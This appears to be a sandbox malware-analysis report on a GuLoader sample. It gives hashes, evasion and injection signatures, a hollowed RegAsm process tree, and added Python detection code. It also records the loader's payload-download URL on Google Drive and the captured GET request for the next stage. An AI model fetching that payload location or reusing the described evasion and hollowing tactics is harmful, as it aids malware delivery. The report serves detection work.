
Windows Analysis Report: Kapitu.exe

Overview

General Information

Sample Name: Kapitu.exe
Analysis ID: 1364
MD5: 149b6bd6b0d3dd2b0fbb111632d59fcc
SHA1: 33cdaa42e1a5c1fad1aa4f38dd9ad6ea75113aa7
SHA256: b622dbe802148305104ef456835748d2fc0d8edeffa64787c43c78bcb1914b2f

Detection

Threat name: GuLoader
Score: 84 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to detect Any.run
C2 URLs / IPs found in malware configuration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
One or more processes crash
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Checks if the current process is being debugged
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64native
  • Kapitu.exe (PID: 6732, cmdline: 'C:\Users\user\Desktop\Kapitu.exe', MD5: 149B6BD6B0D3DD2B0FBB111632D59FCC)
    • RegAsm.exe (PID: 6972, cmdline: 'C:\Users\user\Desktop\Kapitu.exe', MD5: A64DACA3CFBCD039DF3EC29D3EDDD001)
      • conhost.exe (PID: 6980, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • WerFault.exe (PID: 5608, cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 1356, MD5: 40A149513D721F096DDF50C04DA2F01F)
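The process tree above is the classic hollowing footprint: RegAsm.exe (PID 6972) is started by Kapitu.exe with the parent's own command line rather than any RegAsm argument, which matches the report's "Creates a process in suspended mode" and "Writes to foreign memory regions" signatures, and it then crashes (WerFault.exe -p 6972). The Python below is an added example, not code from Joe Sandbox or from the report, that turns that footprint into detection logic over Sysmon-style process-creation events. The event records are constructed from the PIDs, images and command lines listed in the tree; the root's parent PID (1000) and the list of commonly hollowed .NET utilities are assumptions.

```python
"""Added example (not part of the Joe Sandbox report): flag process hollowing from
process-creation events. Record layout mimics Sysmon Event ID 1; the records are
constructed from the report's process tree."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from the report's process tree. ppid 1000 for the root is an
# assumption: the report does not show what launched Kapitu.exe.
EVENTS = [
    ProcEvent(6732, 1000, r"C:\Users\user\Desktop\Kapitu.exe",
              r"'C:\Users\user\Desktop\Kapitu.exe'"),
    ProcEvent(6972, 6732, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe",
              r"'C:\Users\user\Desktop\Kapitu.exe'"),
    ProcEvent(6980, 6972, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(5608, 6972, r"C:\Windows\SysWOW64\WerFault.exe",
              r"C:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 1356"),
]

# Assumed list of .NET framework utilities that loaders of this kind use as
# hollowing hosts; a legitimate launch of these carries arguments for the tool.
HOLLOW_HOSTS = {"regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe",
                "caspol.exe", "aspnet_compiler.exe", "vbc.exe", "csc.exe"}

WERFAULT_PID = re.compile(r"-p\s+(\d+)")


def _basename(path: str) -> str:
    return ntpath.basename(path.strip("'\" ")).lower()


def cmdline_names_image(ev: ProcEvent) -> bool:
    """True when the command line mentions the process's own image name,
    which every normally launched process does."""
    return _basename(ev.image) in ev.cmdline.lower()


def crashed_pids(events):
    """PIDs that WerFault.exe was started for (the -p <pid> argument)."""
    out = set()
    for ev in events:
        if _basename(ev.image) == "werfault.exe":
            m = WERFAULT_PID.search(ev.cmdline)
            if m:
                out.add(int(m.group(1)))
    return out


def find_hollowing(events):
    """Flag children whose command line never names their own image and that
    either inherited the parent's command line verbatim or run a known
    hollowing host. Returns one dict per suspicious child."""
    by_pid = {ev.pid: ev for ev in events}
    crashed = crashed_pids(events)
    hits = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        if parent is None or cmdline_names_image(ev):
            continue
        inherited = ev.cmdline.strip() == parent.cmdline.strip()
        host = _basename(ev.image) in HOLLOW_HOSTS
        if inherited or host:
            hits.append({
                "pid": ev.pid,
                "image": ev.image,
                "parent_image": parent.image,
                "inherited_cmdline": inherited,
                "known_host": host,
                "crashed": ev.pid in crashed,
            })
    return hits


if __name__ == "__main__":
    for hit in find_hollowing(EVENTS):
        print(hit)
```

The image/command-line mismatch is the robust part of this check: a process whose command line is its parent's is almost never legitimate, whereas a bare list of host binaries produces noise on developer machines. The "crashed" flag is worth keeping as a secondary signal; in this run the hollowed RegAsm.exe died under WerFault, which is what an injected payload that never received its second stage tends to do.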

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downloadV"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | -
00000005.00000000.18979643782.0000000001100000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | -
00000005.00000000.18969783001.0000000001100000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | -
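The dump names in the table above encode where the Yara rule fired. The Python below is an added example (not Joe Sandbox code) that parses them and flags hits in memory that is both writable and executable. It reads the field positions off the names as they appear on the page; only the protection field is decoded, against the standard Windows PAGE_* constants, and what the process-index, phase and type fields mean is an assumption marked in the comments. The fourth table row, a WerFault.exe dump taken from the report's PDB-string list, is included as a non-hit control.

```python
"""Added example (not from the report): parse Joe Sandbox memory-dump names and
report Yara hits that sit in RWX memory."""
import re
from dataclasses import dataclass

# Standard Windows memory-protection constants (winnt.h).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80

# <proc>.<phase>.<ident>.<base>.<protection>.<type>.sdmp, positions as seen on the page.
DUMP_NAME = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<ident>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<mtype>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpInfo:
    name: str
    proc_index: int   # assumption: the N in the report's N_2_xxxxxxxx code-function ids
    phase: int        # assumption: dump round (0, 2 or 3 on this page)
    base: int
    protection: str
    executable: bool
    writable: bool


def parse_dump_name(name: str) -> DumpInfo:
    m = DUMP_NAME.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    prot = int(m["prot"], 16)
    flags = prot & 0xFF   # drop modifiers such as PAGE_GUARD (0x100)
    return DumpInfo(
        name=name,
        proc_index=int(m["proc"], 16),
        phase=int(m["phase"], 16),
        base=int(m["base"], 16),
        protection=PAGE_PROTECTION.get(flags, f"0x{prot:X}"),
        executable=bool(flags & EXEC_MASK),
        writable=bool(flags & WRITE_MASK),
    )


# Constructed Yara table: the three hits from the page plus one WerFault.exe dump
# (from the report's PDB-string list) with no rule match, as a control.
YARA_TABLE = [
    ("00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp", "JoeSecurity_GuLoader_2"),
    ("00000005.00000000.18979643782.0000000001100000.00000040.00000001.sdmp", "JoeSecurity_GuLoader_2"),
    ("00000005.00000000.18969783001.0000000001100000.00000040.00000001.sdmp", "JoeSecurity_GuLoader_2"),
    ("00000014.00000003.19040797002.000000000752D000.00000004.00000001.sdmp", None),
]


def rwx_hits(table):
    """Group Yara hits by (process, base address) and keep those in RWX memory:
    the shape of a region carved with NtAllocateVirtualMemory /
    NtProtectVirtualMemory for injected code, rather than a mapped image section."""
    result = {}
    for name, rule in table:
        if rule is None:
            continue
        info = parse_dump_name(name)
        if info.executable and info.writable:
            key = (info.proc_index, info.base)
            entry = result.setdefault(key, {"rule": rule, "protection": info.protection, "dumps": 0})
            entry["dumps"] += 1
    return result


if __name__ == "__main__":
    for (proc, base), entry in rwx_hits(YARA_TABLE).items():
        print(f"process {proc} base 0x{base:08X}: {entry}")
```

All three hits sit at base 0x01100000 in process index 5, which is RegAsm.exe (the report's 5_2_0110xxxx code functions, including the NtAllocateVirtualMemory and NtProtectVirtualMemory calls, live in the same region). An RWX region that was allocated and re-protected at run time, rather than a mapped image section, is the shape of injected shellcode, and it is the address to dump first when reproducing the analysis.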

        Sigma Overview

        No Sigma rule has matched

        Jbx Signature Overview

        AV Detection:

        Found malware configuration
        Source: Kapitu.exe | Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downloadV"}
        Multi AV Scanner detection for submitted file
        Source: Kapitu.exe | Virustotal: Detection: 20%

        The debug-symbol (PDB) path strings that follow were all found in the memory of WerFault.exe, the crash reporter started for the RegAsm.exe process (PID 6972) that the loader injected into; they are a by-product of crash reporting, not strings from Kapitu.exe itself. Characters trailing ".pdb" (such as "(", "O$" or "U$") are stray adjacent bytes picked up by the string scanner, not part of the file names.
        Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000014.00000003.19040797002.000000000752D000.00000004.00000001.sdmp
        Source: Binary string: CLBCatQ.pdb( source: WerFault.exe, 00000014.00000003.19018976729.0000000006CBA000.00000004.00000001.sdmp
        Source: Binary string: cfgmgr32.pdb( source: WerFault.exe, 00000014.00000003.19001076210.0000000005D92000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb( source: WerFault.exe, 00000014.00000003.19016612435.00000000068A6000.00000004.00000001.sdmp
        Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.18994554215.00000000030E6000.00000004.00000001.sdmp
        Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000014.00000003.18996243688.00000000064AC000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000014.00000003.18998561649.0000000005D98000.00000004.00000001.sdmp
        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 00000014.00000003.19026340881.00000000070C2000.00000004.00000001.sdmp
        Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.18994746142.00000000030FC000.00000004.00000001.sdmp
        Source: Binary string: RegAsm.pdb source: WerFault.exe, 00000014.00000003.19054366223.00000000053E1000.00000004.00000001.sdmp
        Source: Binary string: wkernel32.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.19001022681.0000000005D87000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.18994350026.0000000003081000.00000004.00000001.sdmp
        Source: Binary string: srvcli.pdbd source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: winnsi.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.18999101834.00000000064C3000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000014.00000003.19000012560.0000000006895000.00000004.00000001.sdmp
        Source: Binary string: qncryptsslp.pdb source: WerFault.exe, 00000014.00000003.18995486192.0000000005D6E000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb( source: WerFault.exe, 00000014.00000003.18998561649.0000000005D98000.00000004.00000001.sdmp
        Source: Binary string: msi.pdb source: WerFault.exe, 00000014.00000003.19005134690.00000000064BD000.00000004.00000001.sdmp
        Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000014.00000003.19018976729.0000000006CBA000.00000004.00000001.sdmp
        Source: Binary string: winspool.pdb( source: WerFault.exe, 00000014.00000003.18996215101.00000000064A7000.00000004.00000001.sdmp
        Source: Binary string: schannel.pdb source: WerFault.exe, 00000014.00000003.19022355299.00000000070BC000.00000004.00000001.sdmp
        Source: Binary string: urlmon.pdb source: WerFault.exe, 00000014.00000003.19017856487.0000000006F89000.00000004.00000001.sdmp
        Source: Binary string: sfc_os.pdb( source: WerFault.exe, 00000014.00000003.18996243688.00000000064AC000.00000004.00000001.sdmp
        Source: Binary string: crypt32.pdb: source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: mpr.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: bcryptprimitives.pdb( source: WerFault.exe, 00000014.00000003.19020426514.00000000068B1000.00000004.00000001.sdmp
        Source: Binary string: urlmon.pdb( source: WerFault.exe, 00000014.00000003.19017856487.0000000006F89000.00000004.00000001.sdmp
        Source: Binary string: shlwapi.pdbU$ source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: cryptbase.pdb( source: WerFault.exe, 00000014.00000003.19032365056.0000000007588000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: srvcli.pdb source: WerFault.exe, 00000014.00000003.19024960609.0000000006FF2000.00000004.00000001.sdmp
        Source: Binary string: mscoree.pdb source: WerFault.exe, 00000014.00000003.18994396652.0000000003086000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000014.00000003.19020466166.00000000068B7000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb( source: WerFault.exe, 00000014.00000003.18999101834.00000000064C3000.00000004.00000001.sdmp
        Source: Binary string: winspool.pdb source: WerFault.exe, 00000014.00000003.18996215101.00000000064A7000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000014.00000003.19002140835.00000000068CD000.00000004.00000001.sdmp
        Source: Binary string: dpapi.pdb( source: WerFault.exe, 00000014.00000003.19024255597.00000000070D8000.00000004.00000001.sdmp
        Source: Binary string: nsi.pdb source: WerFault.exe, 00000014.00000003.19054366223.00000000053E1000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb( source: WerFault.exe, 00000014.00000003.19001022681.0000000005D87000.00000004.00000001.sdmp
        Source: Binary string: gpapi.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: rsaenh.pdb( source: WerFault.exe, 00000014.00000003.19040797002.000000000752D000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000014.00000003.18994697722.00000000030F7000.00000004.00000001.sdmp
        Source: Binary string: iertutil.pdb source: WerFault.exe, 00000014.00000003.18999955983.000000000688A000.00000004.00000001.sdmp
        Source: Binary string: msasn1.pdb source: WerFault.exe, 00000014.00000003.19025389900.00000000070D3000.00000004.00000001.sdmp
        Source: Binary string: rasadhlp.pdb( source: WerFault.exe, 00000014.00000003.19030215027.00000000070AF000.00000004.00000001.sdmp
        Source: Binary string: winhttp.pdbv< source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: msvcrt.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.18995486192.0000000005D6E000.00000004.00000001.sdmp
        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000014.00000003.19005718854.000000000689B000.00000004.00000001.sdmp
        Source: Binary string: wuser32.pdb( source: WerFault.exe, 00000014.00000003.18996861577.0000000003102000.00000004.00000001.sdmp
        Source: Binary string: iertutil.pdb7 source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wntdll.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb( source: WerFault.exe, 00000014.00000003.18999955983.000000000688A000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdb1 source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000014.00000003.18994554215.00000000030E6000.00000004.00000001.sdmp
        Source: Binary string: sfc.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: ncrypt.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: dnsapi.pdbp source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: dpapi.pdb source: WerFault.exe, 00000014.00000003.19024255597.00000000070D8000.00000004.00000001.sdmp
        Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.18994647821.00000000030F1000.00000004.00000001.sdmp
        Source: Binary string: AcLayers.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: netutils.pdb( source: WerFault.exe, 00000014.00000003.19019857478.000000000704F000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdb( source: WerFault.exe, 00000014.00000003.19006946184.00000000064CE000.00000004.00000001.sdmp
        Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000014.00000003.19030215027.00000000070AF000.00000004.00000001.sdmp
        Source: Binary string: netutils.pdb source: WerFault.exe, 00000014.00000003.19019857478.000000000704F000.00000004.00000001.sdmp
        Source: Binary string: rasadhlp.pdbB0 source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: combase.pdb; source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wininet.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wgdi32full.pdb( source: WerFault.exe, 00000014.00000003.18994946811.0000000003113000.00000004.00000001.sdmp
        Source: Binary string: shell32.pdb( source: WerFault.exe, 00000014.00000003.18995383754.0000000005D5D000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdbu source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: winnsi.pdbn source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb/ source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: msasn1.pdb0 source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: msasn1.pdb( source: WerFault.exe, 00000014.00000003.19025389900.00000000070D3000.00000004.00000001.sdmp
        Source: Binary string: shlwapi.pdb( source: WerFault.exe, 00000014.00000003.18995414777.0000000005D63000.00000004.00000001.sdmp
        Source: Binary string: apphelp.pdb( source: WerFault.exe, 00000014.00000003.18994647821.00000000030F1000.00000004.00000001.sdmp
        Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.18996911288.000000000310D000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb( source: WerFault.exe, 00000014.00000003.19000012560.0000000006895000.00000004.00000001.sdmp
        Source: Binary string: netutils.pdbz source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: shell32.pdb source: WerFault.exe, 00000014.00000003.18995383754.0000000005D5D000.00000004.00000001.sdmp
        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb) source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: mscoree.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: schannel.pdb( source: WerFault.exe, 00000014.00000003.19022355299.00000000070BC000.00000004.00000001.sdmp
        Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000014.00000003.19012140225.00000000070A9000.00000004.00000001.sdmp
        Source: Binary string: wimm32.pdb( source: WerFault.exe, 00000014.00000003.19005081330.00000000064B2000.00000004.00000001.sdmp
        Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.19005081330.00000000064B2000.00000004.00000001.sdmp
        Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: setupapi.pdb source: WerFault.exe, 00000014.00000003.19001051344.0000000005D8D000.00000004.00000001.sdmp
        Source: Binary string: winhttp.pdb source: WerFault.exe, 00000014.00000003.19006667132.00000000068C2000.00000004.00000001.sdmp
        Source: Binary string: Windows.Storage.pdb( source: WerFault.exe, 00000014.00000003.19005718854.000000000689B000.00000004.00000001.sdmp
        Source: Binary string: msi.pdb( source: WerFault.exe, 00000014.00000003.19005134690.00000000064BD000.00000004.00000001.sdmp
        Source: Binary string: sechost.pdb% source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: ntasn1.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: winhttp.pdb( source: WerFault.exe, 00000014.00000003.19006667132.00000000068C2000.00000004.00000001.sdmp
        Source: Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 00000014.00000003.19006628664.00000000068BC000.00000004.00000001.sdmp
        Source: Binary string: combase.pdb( source: WerFault.exe, 00000014.00000003.18995486192.0000000005D6E000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000014.00000003.18994350026.0000000003081000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb source: WerFault.exe, 00000014.00000003.19016612435.00000000068A6000.00000004.00000001.sdmp
        Source: Binary string: msvcrt.pdb( source: WerFault.exe, 00000014.00000003.18994746142.00000000030FC000.00000004.00000001.sdmp
        Source: Binary string: setupapi.pdb( source: WerFault.exe, 00000014.00000003.19001051344.0000000005D8D000.00000004.00000001.sdmp
        Source: Binary string: mskeyprotect.pdb( source: WerFault.exe, 00000014.00000003.19026340881.00000000070C2000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdbS source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: apphelp.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: WLDP.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: sfc_os.pdbG source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: mscoree.pdb( source: WerFault.exe, 00000014.00000003.18994396652.0000000003086000.00000004.00000001.sdmp
        Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 00000014.00000003.19030119844.000000000769F000.00000004.00000001.sdmp
        Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000014.00000003.19022770808.00000000068C7000.00000004.00000001.sdmp
        Source: Binary string: wintrust.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: mskeyprotect.pdb# source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: CLBCatQ.pdb] source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb( source: WerFault.exe, 00000014.00000003.19025355341.00000000070CD000.00000004.00000001.sdmp
        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.19007270851.00000000068AB000.00000004.00000001.sdmp
        Source: Binary string: AcLayers.pdb( source: WerFault.exe, 00000014.00000003.18994697722.00000000030F7000.00000004.00000001.sdmp
        Source: Binary string: urlmon.pdbX* source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: srvcli.pdb( source: WerFault.exe, 00000014.00000003.19024960609.0000000006FF2000.00000004.00000001.sdmp
        Source: Binary string: psapi.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: ws2_32.pdb( source: WerFault.exe, 00000014.00000003.19020466166.00000000068B7000.00000004.00000001.sdmp
        Source: Binary string: setupapi.pdbK source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000014.00000003.19032365056.0000000007588000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdbL6 source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wgdi32.pdb( source: WerFault.exe, 00000014.00000003.18996911288.000000000310D000.00000004.00000001.sdmp
        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.19020426514.00000000068B1000.00000004.00000001.sdmp
        Source: Binary string: OnDemandConnRouteHelper.pdb( source: WerFault.exe, 00000014.00000003.19006628664.00000000068BC000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb( source: WerFault.exe, 00000014.00000003.19002140835.00000000068CD000.00000004.00000001.sdmp
        Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.18995443411.0000000005D68000.00000004.00000001.sdmp
        Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.18996861577.0000000003102000.00000004.00000001.sdmp
        Source: Binary string: cfgmgr32.pdbA source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb source: WerFault.exe, 00000014.00000003.19025355341.00000000070CD000.00000004.00000001.sdmp

        Networking:

        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractor | URLs: https://drive.google.com/uc?export=downloadV
        Source: global traffic | HTTP traffic detected:
            GET /uc?export=download&id=1a0WYfccpP_tzw3yrsNqkLeIjHmcdMRod HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Host: drive.google.com
            Cache-Control: no-cache
        Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (7 occurrences)
        Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=UTF-8
            x-chromium-appcache-fallback-override: disallow-fallback
            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
            Content-Security-Policy: script-src 'nonce-MvTTUjqOi+ULm6tB1JBGlA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
            Date: Mon, 27 Sep 2021 13:08:50 GMT
            Expires: Mon, 27 Sep 2021 13:08:50 GMT
            Cache-Control: private, max-age=0
            X-Content-Type-Options: nosniff
            X-Frame-Options: SAMEORIGIN
            X-XSS-Protection: 1; mode=block
            Server: GSE
